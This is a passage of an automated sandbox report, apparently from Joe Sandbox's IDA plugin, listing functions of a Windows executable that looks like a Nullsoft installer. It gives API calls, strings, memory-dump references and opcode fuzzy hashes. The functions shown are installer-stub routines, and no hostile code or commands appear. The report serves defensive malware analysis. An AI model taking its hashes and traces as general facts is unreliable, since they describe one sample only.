Opcode ID: 89a04da5b1a7f732205bfcbbcbb949e4048d33089e5c9c5f3b92beb7b6129cbb
Instruction ID: ac693f2390e271b0591ead3bca04d252cd9040af8bb9d400f005d771bc7483c2
Opcode Fuzzy Hash: 89a04da5b1a7f732205bfcbbcbb949e4048d33089e5c9c5f3b92beb7b6129cbb
Instruction Fuzzy Hash: 0D61B770244600BFE630AF269D46F273A6CEB44B45F40057EF985B62E2DB7D5911CA2D

Function 004043BA Relevance: 37.0, APIs: 19, Strings: 2, Instructions: 204windowstringCOMMON

Download Yara Rule

APIs

CheckDlgButton.USER32(?,-0000040A,00000001), ref: 00404458
GetDlgItem.USER32(?,000003E8), ref: 0040446C
SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 00404489
GetSysColor.USER32(?), ref: 0040449A
SendMessageW.USER32(00000000,00000443,00000000,?), ref: 004044A8
SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 004044B6
lstrlenW.KERNEL32(?), ref: 004044BB
SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 004044C8
SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 004044DD
GetDlgItem.USER32(?,0000040A), ref: 00404536
SendMessageW.USER32(00000000), ref: 0040453D
GetDlgItem.USER32(?,000003E8), ref: 00404568
SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 004045AB
LoadCursorW.USER32(00000000,00007F02), ref: 004045B9
SetCursor.USER32(00000000), ref: 004045BC
LoadCursorW.USER32(00000000,00007F00), ref: 004045D5
SetCursor.USER32(00000000), ref: 004045D8
SendMessageW.USER32(00000111,00000001,00000000), ref: 00404607
SendMessageW.USER32(00000010,00000000,00000000), ref: 00404619

Strings

N, xrefs: 00404556
1C@, xrefs: 004045C4

Memory Dump Source

Source File: 00000002.00000002.43457672359.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.43457637795.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.43457709803.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.43457745120.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.43457782280.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Fac.jbxd

Similarity

API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
String ID: 1C@$N
API String ID: 3103080414-3285487881
Opcode ID: 5f098caee5535ae1e7b5b61cf078335e238ade03d1551e6bec200614ec9300dd
Instruction ID: 9026ebbe03bb6d5dcd5a9bde039089338ffc2a6a86adc40c9d49ddbc6b033b78
Opcode Fuzzy Hash: 5f098caee5535ae1e7b5b61cf078335e238ade03d1551e6bec200614ec9300dd
Instruction Fuzzy Hash: D161A3B1A00209BFDB109F60DD45EAA7B79FB94305F00853AF705B62E0D779A952CF68

Function 00401000 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 125COMMON

Download Yara Rule

APIs

DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
BeginPaint.USER32(?,?), ref: 00401047
GetClientRect.USER32(?,?), ref: 0040105B
CreateBrushIndirect.GDI32(00000000), ref: 004010CF
FillRect.USER32(00000000,?,00000000), ref: 004010E4
DeleteObject.GDI32(?), ref: 004010ED
CreateFontIndirectW.GDI32(?), ref: 00401105
SetBkMode.GDI32(00000000,00000001), ref: 00401126
SetTextColor.GDI32(00000000,000000FF), ref: 00401130
SelectObject.GDI32(00000000,?), ref: 00401140
DrawTextW.USER32(00000000,00429200,000000FF,00000010,00000820), ref: 00401156
SelectObject.GDI32(00000000,00000000), ref: 00401160
DeleteObject.GDI32(?), ref: 00401165
EndPaint.USER32(?,?), ref: 0040116E

Strings

F, xrefs: 0040100C

Memory Dump Source

Source File: 00000002.00000002.43457672359.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.43457637795.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.43457709803.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.43457745120.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.43457782280.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Fac.jbxd

Similarity

API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
String ID: F
API String ID: 941294808-1304234792
Opcode ID: dddf6588841e3707deee37d13ddb8de347a630f4291ad0a352021d00e496f588
Instruction ID: 53e7ac87f6412b54f62e8112edad18e9e8f6d31619aee210d26213a62ff7d26c
Opcode Fuzzy Hash: dddf6588841e3707deee37d13ddb8de347a630f4291ad0a352021d00e496f588
Instruction Fuzzy Hash: 88418A71800209AFCF058FA5DE459AF7BB9FF44310F00842AF991AA1A0C738D955DFA4

Function 004046EC Relevance: 21.3, APIs: 10, Strings: 2, Instructions: 275stringCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003FB), ref: 0040473B
SetWindowTextW.USER32(00000000,?), ref: 00404765
SHBrowseForFolderW.SHELL32(?), ref: 00404816
CoTaskMemFree.OLE32(00000000), ref: 00404821
lstrcmpiW.KERNEL32(004281A0,004236E8,00000000,?,?), ref: 00404853
lstrcatW.KERNEL32(?,004281A0), ref: 0040485F
SetDlgItemTextW.USER32(?,000003FB,?), ref: 00404871

Part of subcall function 004058CE: GetDlgItemTextW.USER32(?,?,00000400,004048A8), ref: 004058E1

Part of subcall function 00406518: CharNextW.USER32(?,*?|<>/":,00000000,00000000,00437800,00437800,00435000,00403334,00437800,77293420,004035A3,?,00000006,00000008,0000000A), ref: 0040657B
Part of subcall function 00406518: CharNextW.USER32(?,?,?,00000000,?,00000006,00000008,0000000A), ref: 0040658A
Part of subcall function 00406518: CharNextW.USER32(?,00000000,00437800,00437800,00435000,00403334,00437800,77293420,004035A3,?,00000006,00000008,0000000A), ref: 0040658F
Part of subcall function 00406518: CharPrevW.USER32(?,?,00437800,00437800,00435000,00403334,00437800,77293420,004035A3,?,00000006,00000008,0000000A), ref: 004065A2

GetDiskFreeSpaceW.KERNEL32(004216B8,?,?,0000040F,?,004216B8,004216B8,?,00000001,004216B8,?,?,000003FB,?), ref: 00404934
MulDiv.KERNEL32(?,0000040F,00000400), ref: 0040494F

Part of subcall function 00404AA8: lstrlenW.KERNEL32(004236E8,004236E8,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404B49
Part of subcall function 00404AA8: wsprintfW.USER32 ref: 00404B52
Part of subcall function 00404AA8: SetDlgItemTextW.USER32(?,004236E8), ref: 00404B65

Strings

A, xrefs: 0040480F
6B, xrefs: 004047E9

Memory Dump Source

Source File: 00000002.00000002.43457672359.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.43457637795.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.43457709803.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.43457745120.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.43457782280.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Fac.jbxd

Similarity

API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
String ID: A$6B
API String ID: 2624150263-3505403099
Opcode ID: f4822edb5301cf4442e229a76cbeaed91e351fc72555ed6df650faa9417c082b
Instruction ID: 1fca52776cba06a1556b538b397dade1a16f07a9c9d6655049f3c7fe444e155e
Opcode Fuzzy Hash: f4822edb5301cf4442e229a76cbeaed91e351fc72555ed6df650faa9417c082b
Instruction Fuzzy Hash: B4A180F1A00209ABDB11AFA6CD45AAF77B8EF84714F10843BF601B62D1D77C99418B6D

Function 00405ED0 Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 130memorystringCOMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,?,0040606B,?,?), ref: 00405F0B
GetShortPathNameW.KERNEL32(?,00426D88,00000400), ref: 00405F14

Part of subcall function 00405CDF: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405FC4,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405CEF
Part of subcall function 00405CDF: lstrlenA.KERNEL32(00000000,?,00000000,00405FC4,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D21

GetShortPathNameW.KERNEL32(?,00427588,00000400), ref: 00405F31
wsprintfA.USER32 ref: 00405F4F
GetFileSize.KERNEL32(00000000,00000000,00427588,C0000000,00000004,00427588,?,?,?,?,?), ref: 00405F8A
GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00405F99
lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FD1
SetFilePointer.KERNEL32(0040A560,00000000,00000000,00000000,00000000,00426988,00000000,-0000000A,0040A560,00000000,[Rename],00000000,00000000,00000000), ref: 00406027
GlobalFree.KERNEL32(00000000), ref: 00406038
CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 0040603F

Part of subcall function 00405D7A: GetFileAttributesW.KERNEL32(00438800,00402F1D,00438800,80000000,00000003,?,00000006,00000008,0000000A), ref: 00405D7E
Part of subcall function 00405D7A: CreateFileW.KERNEL32(?,?,00000001,00000000,?,00000001,00000000,?,00000006,00000008,0000000A), ref: 00405DA0

Strings

%ls=%ls, xrefs: 00405F45
[Rename], xrefs: 00405FB9, 00405FCB

Memory Dump Source

Source File: 00000002.00000002.43457672359.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.43457637795.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.43457709803.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.43457745120.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.43457782280.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Fac.jbxd

Similarity

API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
String ID: %ls=%ls$[Rename]
API String ID: 2171350718-461813615
Opcode ID: 6c09ebac5ca80c8a4b241fb83fb30afa3bc9886cecd9621b20837952e45bb45a
Instruction ID: cb5629e100ec4411e7767e9ff1715c79388972a83a2f5f57e92a2ee479f5e204
Opcode Fuzzy Hash: 6c09ebac5ca80c8a4b241fb83fb30afa3bc9886cecd9621b20837952e45bb45a
Instruction Fuzzy Hash: 92313571240B19BBD230AB659D48F6B3A5CEF45744F15003BF906F72D2EA7C98118ABD

Function 00402EDD Relevance: 17.7, APIs: 5, Strings: 5, Instructions: 182COMMON

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 00402EEE
GetModuleFileNameW.KERNEL32(00000000,00438800,00000400,?,00000006,00000008,0000000A), ref: 00402F0A

Part of subcall function 00405D7A: GetFileAttributesW.KERNEL32(00438800,00402F1D,00438800,80000000,00000003,?,00000006,00000008,0000000A), ref: 00405D7E
Part of subcall function 00405D7A: CreateFileW.KERNEL32(?,?,00000001,00000000,?,00000001,00000000,?,00000006,00000008,0000000A), ref: 00405DA0

GetFileSize.KERNEL32(00000000,00000000,00439000,00000000,00436800,00436800,00438800,00438800,80000000,00000003,?,00000006,00000008,0000000A), ref: 00402F56

Strings

soft, xrefs: 00402FCB
Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 004030B5
Null, xrefs: 00402FD4
Inst, xrefs: 00402FC2
Error launching installer, xrefs: 00402F2D

Memory Dump Source

Source File: 00000002.00000002.43457672359.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.43457637795.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.43457709803.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.43457745120.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.43457782280.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Fac.jbxd

Similarity

API ID: File$AttributesCountCreateModuleNameSizeTick
String ID: Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
API String ID: 4283519449-527102705
Opcode ID: 267abab7d79e74cef5e3127b9650355ecd25f4611b06b3885a53204473977592
Instruction ID: 8370a5f95b7ae461dcbe38738d17cc5e552d4c17a0c1bed0763bf9a4eadef116
Opcode Fuzzy Hash: 267abab7d79e74cef5e3127b9650355ecd25f4611b06b3885a53204473977592
Instruction Fuzzy Hash: FF51D171901204AFDB20AF65DD85B9E7FA8EB04319F14417BF904B72D5C7788E818BAD

Function 004062A6 Relevance: 16.0, APIs: 7, Strings: 2, Instructions: 209stringCOMMON

Download Yara Rule

APIs

GetSystemDirectoryW.KERNEL32(004281A0,00000400), ref: 004063E7
GetWindowsDirectoryW.KERNEL32(004281A0,00000400,00000000,004226C8,?,00405323,004226C8,00000000), ref: 004063FA
SHGetSpecialFolderLocation.SHELL32(00405323,?,00000000,004226C8,?,00405323,004226C8,00000000), ref: 00406436
SHGetPathFromIDListW.SHELL32(?,004281A0), ref: 00406444
CoTaskMemFree.OLE32(?), ref: 0040644F
lstrcatW.KERNEL32(004281A0,\Microsoft\Internet Explorer\Quick Launch), ref: 00406475
lstrlenW.KERNEL32(004281A0,00000000,004226C8,?,00405323,004226C8,00000000), ref: 004064CD

Strings

\Microsoft\Internet Explorer\Quick Launch, xrefs: 0040646F
Software\Microsoft\Windows\CurrentVersion, xrefs: 004063B7

Memory Dump Source

Source File: 00000002.00000002.43457672359.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.43457637795.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.43457709803.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.43457745120.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.43457782280.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Fac.jbxd

Similarity

API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskWindowslstrcatlstrlen
String ID: Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
API String ID: 717251189-730719616
Opcode ID: 1e760ec33e8736f6c82404e72030ce22e22765ed589060b9a69778a605fdc3c8
Instruction ID: 605843c2509a57f6f3c23207e2b9262681d5cb504286618bc70e882f3b2b38d7
Opcode Fuzzy Hash: 1e760ec33e8736f6c82404e72030ce22e22765ed589060b9a69778a605fdc3c8
Instruction Fuzzy Hash: 2C611171A00215ABDF209F64CC40AAE37A5AF54314F22813FE947BB2D0D77D5AA2CB5D

Function 00404262 Relevance: 12.1, APIs: 8, Instructions: 68COMMON

Download Yara Rule

APIs

GetWindowLongW.USER32(?,000000EB), ref: 0040427F
GetSysColor.USER32(00000000), ref: 004042BD
SetTextColor.GDI32(?,00000000), ref: 004042C9
SetBkMode.GDI32(?,?), ref: 004042D5
GetSysColor.USER32(?), ref: 004042E8
SetBkColor.GDI32(?,?), ref: 004042F8
DeleteObject.GDI32(?), ref: 00404312
CreateBrushIndirect.GDI32(?), ref: 0040431C

Memory Dump Source

Source File: 00000002.00000002.43457672359.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.43457637795.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.43457709803.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.43457745120.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.43457782280.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Fac.jbxd

Similarity

API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
String ID:
API String ID: 2320649405-0
Opcode ID: cedac81959eb3ef19a74f908d68e4e703a61b794166ebd5b231b869c6a402091
Instruction ID: 0f30b588a8d7f9bbf1461c481b53b443173021fc121084549064eaca6d41b1d8
Opcode Fuzzy Hash: cedac81959eb3ef19a74f908d68e4e703a61b794166ebd5b231b869c6a402091
Instruction Fuzzy Hash: CD2174716007059FCB319F68DE48A5BBBF8AF81711B048A3EFD96A26E0D734D944CB54

Function 0040264A Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 153fileCOMMON

Download Yara Rule

APIs

ReadFile.KERNEL32(?,?,?,?), ref: 004026B6
MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 004026F1
SetFilePointer.KERNEL32(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 00402714
MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 0040272A

Part of subcall function 00405E5B: SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 00405E71

SetFilePointer.KERNEL32(?,?,?,00000001,?,?,00000002), ref: 004027D6

Strings

9, xrefs: 00402699

Memory Dump Source

Source File: 00000002.00000002.43457672359.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.43457637795.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.43457709803.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.43457745120.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.43457782280.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Fac.jbxd

Similarity

API ID: File$Pointer$ByteCharMultiWide$Read
String ID: 9
API String ID: 163830602-2366072709
Opcode ID: c1a2398a3cf68ffccba9bba39206efc2048042628f08e4a72376123c44d13fd0
Instruction ID: 3d8386ac743f87b5a59d0c6af2c48158715b6bf8f4fdb2ba716f86882e7a1e00
Opcode Fuzzy Hash: c1a2398a3cf68ffccba9bba39206efc2048042628f08e4a72376123c44d13fd0
Instruction Fuzzy Hash: 46510A74D10219AEDF219F95DA88AAEB779FF04304F50443BE901F72D1D7B49982CB58

Function 004052EC Relevance: 10.6, APIs: 7, Instructions: 72stringwindowCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(004226C8,00000000,?,004030B0,?,?,?,?,?,?,?,?,?,0040324F,00000000,?), ref: 00405324
lstrlenW.KERNEL32(0040324F,004226C8,00000000,?,004030B0,?,?,?,?,?,?,?,?,?,0040324F,00000000), ref: 00405334
lstrcatW.KERNEL32(004226C8,0040324F,0040324F,004226C8,00000000,?,004030B0), ref: 00405347
SetWindowTextW.USER32(004226C8,004226C8), ref: 00405359
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040537F
SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405399
SendMessageW.USER32(?,00001013,?,00000000), ref: 004053A7

Memory Dump Source

Source File: 00000002.00000002.43457672359.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.43457637795.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.43457709803.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.43457745120.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.43457782280.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Fac.jbxd

Similarity

API ID: MessageSend$lstrlen$TextWindowlstrcat
String ID:
API String ID: 2531174081-0
Opcode ID: 4d71bf0a7f433355d78e1bdcf512e296b69b6d66b67d6526b045d43343bf71c9
Instruction ID: 5cbdc996bc9841dedcc8c590482a37e7ed43af3164ff52369f5afd8429117419
Opcode Fuzzy Hash: 4d71bf0a7f433355d78e1bdcf512e296b69b6d66b67d6526b045d43343bf71c9
Instruction Fuzzy Hash: FA219D71900618BBDB11AF96DD849CFBF78EF45354F50807AF904B62A0C3B94A50CFA8

Function 00404BB6 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404BD1
GetMessagePos.USER32 ref: 00404BD9
ScreenToClient.USER32(?,?), ref: 00404BF3
SendMessageW.USER32(?,00001111,00000000,?), ref: 00404C05
SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404C2B

Strings

f, xrefs: 00404C07

Memory Dump Source

Source File: 00000002.00000002.43457672359.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.43457637795.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.43457709803.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.43457745120.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.43457782280.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Fac.jbxd

Similarity

API ID: Message$Send$ClientScreen
String ID: f
API String ID: 41195575-1993550816
Opcode ID: e2d2d6aa42d138b4bf43a857dc2fb8cfa63f2fbdf5f441295addbf44c9bf4daa
Instruction ID: ae0188e128420319643ad50796f74bd77cac7447aa244d18a8bf097087cf05ab
Opcode Fuzzy Hash: e2d2d6aa42d138b4bf43a857dc2fb8cfa63f2fbdf5f441295addbf44c9bf4daa
Instruction Fuzzy Hash: 9C019E7190021CBAEB00DB94DD81BFFBBBCAF95711F10412BBB10B61D0C7B499418BA4

Function 00402DF3 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40timeCOMMON

Download Yara Rule

APIs

SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402E11
MulDiv.KERNEL32(?,00000064,?), ref: 00402E3C
wsprintfW.USER32 ref: 00402E4C
SetWindowTextW.USER32(?,?), ref: 00402E5C
SetDlgItemTextW.USER32(?,00000406,?), ref: 00402E6E

Strings

verifying installer: %d%%, xrefs: 00402E46

Memory Dump Source

Source File: 00000002.00000002.43457672359.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.43457637795.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.43457709803.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.43457745120.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.43457782280.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Fac.jbxd

Similarity

API ID: Text$ItemTimerWindowwsprintf
String ID: verifying installer: %d%%
API String ID: 1451636040-82062127
Opcode ID: 66d2592fca5784473147c8150b099ced33c2aea089bdfd78c1b867d04e1d1f0a
Instruction ID: 4bcbb139cde21edcf0ff7b700e9789e452b98774f77cb7efe3bd4e4e9d403b43
Opcode Fuzzy Hash: 66d2592fca5784473147c8150b099ced33c2aea089bdfd78c1b867d04e1d1f0a
Instruction Fuzzy Hash: C701F47154020CABDF209F60DE49FAA3B69EB44705F008439FA45B51E0DBB995558F98

Function 004065EE Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 36libraryCOMMON

Download Yara Rule

APIs

GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00406605
wsprintfW.USER32 ref: 00406640
LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 00406654

Strings

\, xrefs: 00406616
UXTHEME, xrefs: 004065F7
%s%S.dll, xrefs: 0040663A

Memory Dump Source

Source File: 00000002.00000002.43457672359.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.43457637795.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.43457709803.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.43457745120.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.43457782280.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Fac.jbxd

Similarity

API ID: DirectoryLibraryLoadSystemwsprintf
String ID: %s%S.dll$UXTHEME$\
API String ID: 2200240437-1946221925
Opcode ID: fcd04411c5a1f64f7e9219edfc5ac0d332aa1f587fd7b062781a7321f30925af
Instruction ID: 0a3accc906e0554885a7c349f3439cc1632e9825758041c21a8046ddc9b1cf8d
Opcode Fuzzy Hash: fcd04411c5a1f64f7e9219edfc5ac0d332aa1f587fd7b062781a7321f30925af
Instruction Fuzzy Hash: 28F0217050111967CB10EB64DD0DFAB3B6CA700304F10487AA547F10D1EBBDDB64CB98

Function 004028AD Relevance: 9.1, APIs: 6, Instructions: 86memoryfileCOMMON

Download Yara Rule

APIs

GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000), ref: 00402901
GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 0040291D
GlobalFree.KERNEL32(?), ref: 00402956
GlobalFree.KERNEL32(00000000), ref: 00402969
CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,000000F0), ref: 00402981
DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000), ref: 00402995

Memory Dump Source

Source File: 00000002.00000002.43457672359.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.43457637795.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.43457709803.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.43457745120.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.43457782280.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Fac.jbxd

Similarity

API ID: Global$AllocFree$CloseDeleteFileHandle
String ID:
API String ID: 2667972263-0
Opcode ID: c69d54323394f40509acc41500ccf4ee793a6b17b65874263322f206e89ee029
Instruction ID: 08f8d52deffd015bf7aba9006bc7b8b19cff7c85b8e7ef16137ebd65050c2e74
Opcode Fuzzy Hash: c69d54323394f40509acc41500ccf4ee793a6b17b65874263322f206e89ee029
Instruction Fuzzy Hash: 1B218071C00528BBCF116FA5DE49D9E7E79EF08364F10023AF954762E1CB794D419B98

Function 00403116 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 155COMMON

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 00403177
GetTickCount.KERNEL32 ref: 004031F8
MulDiv.KERNEL32(7FFFFFFF,00000064,00000000), ref: 00403225
wsprintfW.USER32 ref: 00403238

Strings

... %d%%, xrefs: 00403232

Memory Dump Source

Source File: 00000002.00000002.43457672359.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.43457637795.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.43457709803.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.43457745120.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.43457782280.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Fac.jbxd

Similarity

API ID: CountTick$wsprintf
String ID: ... %d%%
API String ID: 551687249-2449383134
Opcode ID: 4944b1251af356e6bb346b061a98c6763ac612778cf045ef7954e78779300cc0
Instruction ID: eb9965c025c0ad248c1811abffb3300191da1be904cace2ded6344ef59bce26d
Opcode Fuzzy Hash: 4944b1251af356e6bb346b061a98c6763ac612778cf045ef7954e78779300cc0
Instruction Fuzzy Hash: 97516B71900219EBCB10DF65EA44A9F3BA8AF44766F1441BFFC04B72C1C7789E518BA9

Function 00404AA8 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 84stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(004236E8,004236E8,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404B49
wsprintfW.USER32 ref: 00404B52
SetDlgItemTextW.USER32(?,004236E8), ref: 00404B65

Strings

6B, xrefs: 00404B3B
%u.%u%s%s, xrefs: 00404B33

Memory Dump Source

Source File: 00000002.00000002.43457672359.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

